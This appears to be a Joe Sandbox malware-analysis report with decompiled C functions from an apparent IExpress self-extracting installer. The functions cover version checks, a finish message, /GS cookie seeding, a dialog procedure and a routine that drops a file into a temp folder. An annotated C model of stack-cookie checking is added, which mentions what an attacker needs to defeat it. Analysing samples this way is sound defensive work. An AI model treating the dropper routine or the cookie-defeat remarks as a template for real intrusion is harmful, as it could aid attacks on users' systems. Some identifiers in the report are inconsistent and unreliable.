• Instruction ID: 0c8fdc9ef4581ad649a94f251ba2354082681b27f8f433e62ce281c636b7a666
• Opcode Fuzzy Hash: 15c129d862528f9a5debb6e9b187f675461d5fea5d6e598d292d4196daaa85ef
• Instruction Fuzzy Hash: 5A01A470A04108BBDB54EB64DC49EEE7B78EF64311F9041A5F5C9A21D0DFB09ECACA51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled by the sandbox. Walks a table of 0x3c-byte entries hanging off the
   object in __ecx, resolves each entry's file path (E00132773), reads the file's
   version resource and compares it against the entry's version range (E00132A89).
   Returns 1 when every entry passes, 0 on the first failing entry; the index of the
   entry reached is written to *_a8. */
E001328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
	void* _v8;
	char* _v12;
	intOrPtr _v16;
	void* _v20;
	intOrPtr _v24;
	int _v28;
	int _v32;
	void* _v36;
	int _v40;
	void* _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	intOrPtr _v56;
	intOrPtr _v60;
	intOrPtr _v64;
	intOrPtr _t62; /* byte offset of the current table entry; was not declared in the listing */
	long _t68;
	void* _t70;
	void* _t73;
	void* _t79;
	void* _t83;
	void* _t87;
	void* _t88;
	intOrPtr _t93;
	intOrPtr _t97;
	intOrPtr _t99;
	int _t101;
	void* _t103;
	void* _t106;
	void* _t109;
	void* _t110; /* stack frame base used for _v52.._v64 stores; not assigned in the listing */

	_v12 = __edx;
	_t99 = __ecx;
	_t106 = 0;
	_v16 = __ecx;
	_t87 = 0;     /* entry index */
	_t103 = 0;    /* GlobalAlloc handle for the version-info buffer */
	_v20 = 0;
	if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) { /* entry count at +0x7c */
		L19:
		_t106 = 1; /* no entries left (or none at all): success */
	} else {
		_t62 = 0;
		_v8 = 0;
		while(1) {
			_v24 =  *((intOrPtr*)(_t99 + 0x80));
			/* build the path for this entry into _v12; bail out if that fails */
			if(E00132773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
				goto L20;
			}
			_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
			_v28 = _t68;
			if(_t68 == 0) {
				/* file has no version resource: accept only if the entry has no version bounds */
				_t99 = _v16;
				_t70 = _v8 + _t99;
				_t93 = _v24;
				_t87 = _v20;
				if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
					goto L18;
				}
			} else {
				_t103 = GlobalAlloc(0x42, _t68); /* GMEM_MOVEABLE | GMEM_ZEROINIT */
				if(_t103 != 0) {
					_t73 = GlobalLock(_t103);
					_v36 = _t73;
					if(_t73 != 0) {
						/* query the root VS_FIXEDFILEINFO block */
						if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
							L15:
							GlobalUnlock(_t103);
							_t99 = _v16;
							L18:
							/* advance to the next 0x3c-byte entry */
							_t87 = _t87 + 1;
							_t62 = _v8 + 0x3c;
							_v20 = _t87;
							_v8 = _v8 + 0x3c;
							if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
								continue;
							} else {
								goto L19;
							}
						} else {
							_t79 = _v44;
							_t88 = _t106;
							_v28 =  *((intOrPtr*)(_t79 + 0xc)); /* dwFileVersionLS */
							_t101 = _v28;
							_v48 =  *((intOrPtr*)(_t79 + 8));  /* dwFileVersionMS */
							_t83 = _v8 + _v16 + _v24 + 0x94;
							_t97 = _v48;
							_v36 = _t83;
							_t109 = _t83;
							/* compare the file version against the entry's lower and upper bounds */
							do {
								 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00132A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
								 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00132A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
								_t109 = _t109 + 0x18;
								_t88 = _t88 + 4;
							} while (_t88 < 8);
							_t87 = _v20;
							_t106 = 0;
							if(_v56 < 0 || _v64 > 0) {
								if(_v52 < _t106 || _v60 > _t106) {
									GlobalUnlock(_t103); /* version outside the allowed range: fail */
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						}
					}
				}
			}
			goto L20;
		}
	}
	L20:
	 *_a8 = _t87;
	if(_t103 != 0) {
		GlobalFree(_t103);
	}
	return _t106;
}
Instruction addresses (listing columns other than the address were not extracted):
0x001328f1 0x001328f4 0x001328f7 0x001328f9 0x001328fc 0x001328ff 0x00132901 0x00132907
0x00132a62 0x00132a64 0x0013290d 0x0013290d 0x0013290f 0x00132912 0x00132920 0x00132937
0x00000000 0x00000000 0x00132944 0x0013294a 0x0013294f 0x00132a2f 0x00132a32 0x00132a34
0x00132a37
                                                                                                                                                                                                    0x00132a41
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132955
                                                                                                                                                                                                    0x0013295e
                                                                                                                                                                                                    0x00132962
                                                                                                                                                                                                    0x00132969
                                                                                                                                                                                                    0x0013296f
                                                                                                                                                                                                    0x00132974
                                                                                                                                                                                                    0x0013298c
                                                                                                                                                                                                    0x00132a20
                                                                                                                                                                                                    0x00132a21
                                                                                                                                                                                                    0x00132a27
                                                                                                                                                                                                    0x00132a4c
                                                                                                                                                                                                    0x00132a4f
                                                                                                                                                                                                    0x00132a50
                                                                                                                                                                                                    0x00132a53
                                                                                                                                                                                                    0x00132a56
                                                                                                                                                                                                    0x00132a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001329b2
                                                                                                                                                                                                    0x001329b2
                                                                                                                                                                                                    0x001329b5
                                                                                                                                                                                                    0x001329bd
                                                                                                                                                                                                    0x001329c3
                                                                                                                                                                                                    0x001329cc
                                                                                                                                                                                                    0x001329d5
                                                                                                                                                                                                    0x001329d7
                                                                                                                                                                                                    0x001329da
                                                                                                                                                                                                    0x001329dd
                                                                                                                                                                                                    0x001329df
                                                                                                                                                                                                    0x001329ec
                                                                                                                                                                                                    0x001329f8
                                                                                                                                                                                                    0x001329fc
                                                                                                                                                                                                    0x001329ff
                                                                                                                                                                                                    0x00132a02
                                                                                                                                                                                                    0x00132a07
                                                                                                                                                                                                    0x00132a0a
                                                                                                                                                                                                    0x00132a0f
                                                                                                                                                                                                    0x00132a19
                                                                                                                                                                                                    0x00132a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132a0f
                                                                                                                                                                                                    0x0013298c
                                                                                                                                                                                                    0x00132974
                                                                                                                                                                                                    0x00132962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013294f
                                                                                                                                                                                                    0x00132912
                                                                                                                                                                                                    0x00132a65
                                                                                                                                                                                                    0x00132a68
                                                                                                                                                                                                    0x00132a6c
                                                                                                                                                                                                    0x00132a6f
                                                                                                                                                                                                    0x00132a6f
                                                                                                                                                                                                    0x00132a7d

APIs
• GlobalFree.KERNEL32 ref: 00132A6F
  • Part of subcall function 00132773: CharUpperA.USER32(E764604F,00000000,00000000,00000000), ref: 001327A8
  • Part of subcall function 00132773: CharNextA.USER32(0000054D), ref: 001327B5
  • Part of subcall function 00132773: CharNextA.USER32(00000000), ref: 001327BC
  • Part of subcall function 00132773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132829
  • Part of subcall function 00132773: RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132852
  • Part of subcall function 00132773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132870
  • Part of subcall function 00132773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001328A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00133938,?,?,?,?,-00000005), ref: 00132958
• GlobalLock.KERNEL32 ref: 00132969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00133938,?,?,?,?,-00000005,?), ref: 00132A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00132A81
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID:
• API String ID: 3949799724-0
• Opcode ID: d6479b7c2bd029a1ec2679ab5d7e9cbd1aaaf473decbe9297c33d8d1f43cffed
• Instruction ID: 685a4a7e3b6f7ddc4aabc0909b9ca8e9fa548c277f35c81aae16b331a33aa091
• Opcode Fuzzy Hash: d6479b7c2bd029a1ec2679ab5d7e9cbd1aaaf473decbe9297c33d8d1f43cffed
• Instruction Fuzzy Hash: 25513A31E00219EFCB25EF98C884AAEFBB9FF48710F14412AE945E3611DB319D41DB90
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 32%
	E00134169(void* __eflags) {
		int _t18;
		void* _t21;

		_t20 = E0013468F("FINISHMSG", 0, 0);
		_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
		if(_t21 != 0) {
			if(E0013468F("FINISHMSG", _t21, _t20) != 0) {
				if(lstrcmpA(_t21, "<None>") == 0) {
					L7:
					return LocalFree(_t21);
				}
				_push(0);
				_push(0x40);
				_push(0);
				_push(_t21);
				_t18 = 0x3e9;
				L6:
				E001344B9(0, _t18);
				goto L7;
			}
			_push(0);
			_push(0x10);
			_push(0);
			_push(0);
			_t18 = 0x4b1;
			goto L6;
		}
		return E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
	}

Address column for the listing above (flattened from the side-by-side layout): 0x0013417d 0x0013418f 0x00134193 0x001341b7 0x001341d3 0x001341e6 0x00000000 0x001341e7 0x001341d5 0x001341d6 0x001341d8 0x001341d9 0x001341da 0x001341df 0x001341e1 0x00000000 0x001341e1 0x001341b9 0x001341ba 0x001341bc 0x001341bd 0x001341be 0x00000000 0x001341be 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001330B4), ref: 00134189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001330B4), ref: 001341E7
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: be710e66c7bfc4f189c089e47d6cea68e8867ba6a23c9ef556dea8fef9647dd5
                                                                                                                                                                                                    • Instruction ID: 79c9ee75ef8790ccad868978c7b0d96913d399668139865302f5246b437d0398
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be710e66c7bfc4f189c089e47d6cea68e8867ba6a23c9ef556dea8fef9647dd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82014FF13006243BF3282A654C86F7B258EEFE0794F000035B746E21808BA8FC8000B9
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
			/* MSVC CRT __security_init_cookie (/GS stack-cookie seeding). The global
			   cookie lives at 0x138004 and its bitwise complement at 0x138008; the
			   function only reseeds when the cookie still holds the linker default
			   0xbb40e64e (or has a zero high word). This is CRT start-up code, not
			   the sample's own logic. */
			E00137155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;   // zero the FILETIME
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x138004; // __security_cookie; 0xe764604f is the value observed in the dump (already seeded)
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {   // default or weak cookie: derive a new one
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;   // XOR-fold the entropy sources
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;   // also mixes in the (ASLR-randomised) stack address
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;   // _v20 is the counter's HighPart
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x138004 & 0xffff0000) == 0) {   // never keep the default value
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x138004 = _t39;   // __security_cookie
				}
				_t37 =  !_t36;   // bitwise NOT of the cookie
				 *0x138008 = _t37;   // __security_cookie_complement
				return _t37;
			}











Address column for the listing above (flattened from the side-by-side layout): 0x0013715d 0x00137161 0x00137165 0x00137178 0x00137182 0x0013718e 0x00137197 0x001371a0 0x001371b1 0x001371b8 0x001371c4 0x001371c7 0x001371cb 0x001371d5 0x001371da 0x001371da 0x001371dc 0x001371dc 0x001371e2 0x001371e5 0x001371ee

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00137182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00137191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0013719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 001371A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001371B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: cebd3e2cbef2ba98fd832ac5e1a51f83cf4147486555c304e46e3ccbf0238959
                                                                                                                                                                                                    • Instruction ID: 20570957400ee8bb113e7f71ddddb7e351cc52b8c899723fcf59dbce6e59f059
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebd3e2cbef2ba98fd832ac5e1a51f83cf4147486555c304e46e3ccbf0238959
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9112EB1D05208DFCB14DFB8DA48A9EBBF4FF58315FA14855E805E7650EB309B458B41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
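The listing E00137155 above is the CRT's /GS cookie seeding, and the prologue of E001319E0 (`_v8 = cookie ^ ebp`) is the matching per-frame guard. The following C program is an added example, not code from the sample or from Joe Sandbox: it models the derivation, the two guards against a default or weak cookie, and the prologue/epilogue check, so an analyst can see why a single-byte overrun into the slot is caught. The Windows API calls are replaced by a caller-supplied `gs_entropy` struct (an assumption so the code runs anywhere), and the sample values are constructed; the second guard is applied to the derived value, which is the CRT's intent (the decompiler renders it as a re-read of the global).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Linker default that __security_init_cookie refuses to keep. */
#define DEFAULT_SECURITY_COOKIE 0xbb40e64eu

/* Entropy sources the 32-bit CRT mixes (see the API list for E00137155).
 * Assumption: callers supply them instead of calling the Windows APIs. */
typedef struct {
    uint32_t filetime_low;   /* GetSystemTimeAsFileTime */
    uint32_t filetime_high;
    uint32_t pid;            /* GetCurrentProcessId */
    uint32_t tid;            /* GetCurrentThreadId */
    uint32_t tick;           /* GetTickCount */
    uint32_t stack_addr;     /* address of a local: randomised by ASLR */
    uint32_t perf_low;       /* QueryPerformanceCounter */
    uint32_t perf_high;
} gs_entropy;

/* Globals standing in for 0x138004 / 0x138008 in the dump. */
static uint32_t security_cookie = DEFAULT_SECURITY_COOKIE;
static uint32_t security_cookie_complement = ~DEFAULT_SECURITY_COOKIE;

/* XOR-fold the sources in the order the listing shows, then reject a result
 * that equals the default or has a zero high word (a zero high word is easy
 * to reproduce with an overflow that writes NUL bytes). */
uint32_t gs_derive_cookie(const gs_entropy *e) {
    uint32_t c = e->filetime_high ^ e->filetime_low;
    c ^= e->pid;
    c ^= e->tid;
    c ^= e->tick;
    c ^= e->stack_addr;
    c ^= e->perf_high ^ e->perf_low;
    if (c == DEFAULT_SECURITY_COOKIE || (c & 0xffff0000u) == 0)
        c = DEFAULT_SECURITY_COOKIE + 1;   /* 0xbb40e64f, as in the listing */
    return c;
}

/* __security_init_cookie: reseed only while the global is still default or
 * weak, then publish cookie and ~cookie. Returns the complement, as the
 * listing does. */
uint32_t gs_init_cookie(const gs_entropy *e) {
    if (security_cookie == DEFAULT_SECURITY_COOKIE ||
        (security_cookie & 0xffff0000u) == 0) {
        security_cookie = gs_derive_cookie(e);
    }
    security_cookie_complement = ~security_cookie;
    return security_cookie_complement;
}

/* Prologue: the slot placed above the local buffers holds cookie ^ frame
 * pointer, exactly what E001319E0 computes into _v8. */
uint32_t gs_prologue(uint32_t frame_ptr) {
    return security_cookie ^ frame_ptr;
}

/* Epilogue (__security_check_cookie): true when the slot is intact. */
bool gs_check(uint32_t slot, uint32_t frame_ptr) {
    return (slot ^ frame_ptr) == security_cookie;
}

/* Demonstration with constructed entropy: a single byte clobbered in the
 * slot, as an overrun of a buffer below it would do, must fail the check. */
bool gs_detects_overwrite(void) {
    gs_entropy e = { 0x8f3b1e40u, 0x01d95a2cu, 0x1a2cu, 0x0f50u,
                     0x0012d687u, 0x0019ff1cu, 0x2a6b4c1du, 0x3u };
    gs_init_cookie(&e);
    uint32_t frame = 0x0019ff30u;
    uint32_t slot = gs_prologue(frame);
    slot ^= 0x41u;   /* one byte of the slot changed by the overrun */
    return !gs_check(slot, frame);
}

int main(void) {
    printf("overrun detected: %s\n", gs_detects_overwrite() ? "yes" : "no");
    return 0;
}
```

The cookie is per process, not per frame, which is why the prologue XORs in the frame pointer: an attacker who leaks the slot from one frame still has to know ebp to rebuild it for another. The weak-cookie guard in `gs_init_cookie` is also what makes the observed value 0xe764604f plausible for a seeded process: its high word is non-zero and it is not the default.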

                                                                                                                                                                                                    C-Code - Quality: 93%
			/* Dialog procedure: _a4 is the HWND, _a8 the message, _a12/_a16 wParam/lParam.
			   The frame holds a 512-byte buffer (_v520) below the /GS cookie slot (_v8). */
			E001319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x138004; // __security_cookie, 0xe764604f in the dump
				_v8 = _t11 ^ _t35;   // /GS prologue: cookie ^ ebp stored in the slot above the buffer
				_t34 = _a4;
				_t14 = _a8 - 0x110;   // 0x110 = WM_INITDIALOG
				if(_t14 == 0) {
                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                    					E001343D0(_t34, _t15);
                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x139a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                    			}
Statement addresses (one per decompiled statement, in listing order; 0x00000000 stands for a synthesized goto): 0x001319e0 0x001319e0 0x001319eb 0x001319f2 0x001319f9 0x001319fc 0x00131a01 0x00131a2a 0x00131a2e 0x00131a3e 0x00131a4f 0x00131a62 0x00131a6a 0x00000000 0x00131a03 0x00131a06 0x00131a20 0x00131a20 0x00131a08 0x00131a08 0x00131a14 0x00000000 0x00131a16 0x00131a18 0x00131a70 0x00131a72 0x00131a72 0x00131a14 0x00131a06 0x00131a81

APIs
• EndDialog.USER32(?,?), ref: 00131A18
• GetDesktopWindow.USER32 ref: 00131A24
• LoadStringA.USER32(?,?,00000200), ref: 00131A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00131A62
• MessageBeep.USER32(000000FF), ref: 00131A6A
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: f079dfcc4246a15b2fbc5f5fb0165fb79ca86f4a2b521afca42efaac88b0ff4b
• Instruction ID: 277b51ca7e95195ad516b2a6f1f766639c28b30650e097ff02f580488e11033d
• Opcode Fuzzy Hash: f079dfcc4246a15b2fbc5f5fb0165fb79ca86f4a2b521afca42efaac88b0ff4b
• Instruction Fuzzy Hash: D811C031601159AFDB10EF68EE08AEE77B8FF49301F508154FA56D3590DB30AE81DB95
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E001363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				/* Drops a file: writes _a4 bytes from _a16 to <staging dir>\<_a12>. Returns 1 on success, 0 on failure. */
				signed int _v8;          /* /GS stack cookie copy */
				char _v268;              /* MAX_PATH (0x104) path buffer */
				long _v272;              /* bytes written, filled by WriteFile */
				void* _v276;             /* pointer to the data to write */
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37; /* actually the boolean result; the decompiler mistyped it */
				void* _t39;              /* file handle */
				signed int _t40;

				_t15 =  *0x138004; // 0xe764604f, the module's __security_cookie
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;                                  // assume success
				E00131781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");   // (buffer, size, ..., source): appears to copy the hard-coded staging directory into the path buffer
				E0013658A( &_v268, 0x104, _a12);           // (buffer, size, name): appears to append the file name
				_t28 = 0;
				// GENERIC_WRITE (0x40000000), no sharing, CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (0x80)
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {                   // INVALID_HANDLE_VALUE
					_t28 = _a4;
					// a short write (fewer bytes than requested) is treated as a failure as well
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x139124 = 0x80070052;           // HRESULT_FROM_WIN32(ERROR_CANNOT_MAKE): last-error global
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x139124 = 0x80070052;               // same error code when the file cannot be created
					_t37 = 0;
				}
				return E00136CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);   // common return path with /GS cookie check
			}
Statement addresses (one per decompiled statement, in listing order): 0x001363cb 0x001363d2 0x001363d8 0x001363ea 0x001363f3 0x00136401 0x00136402 0x00136410 0x00136415 0x00136433 0x00136438 0x00136449 0x00136463 0x0013646d 0x00136477 0x00136477 0x0013647a 0x0013643a 0x0013643a 0x00136444 0x00136444 0x00136492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001363EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
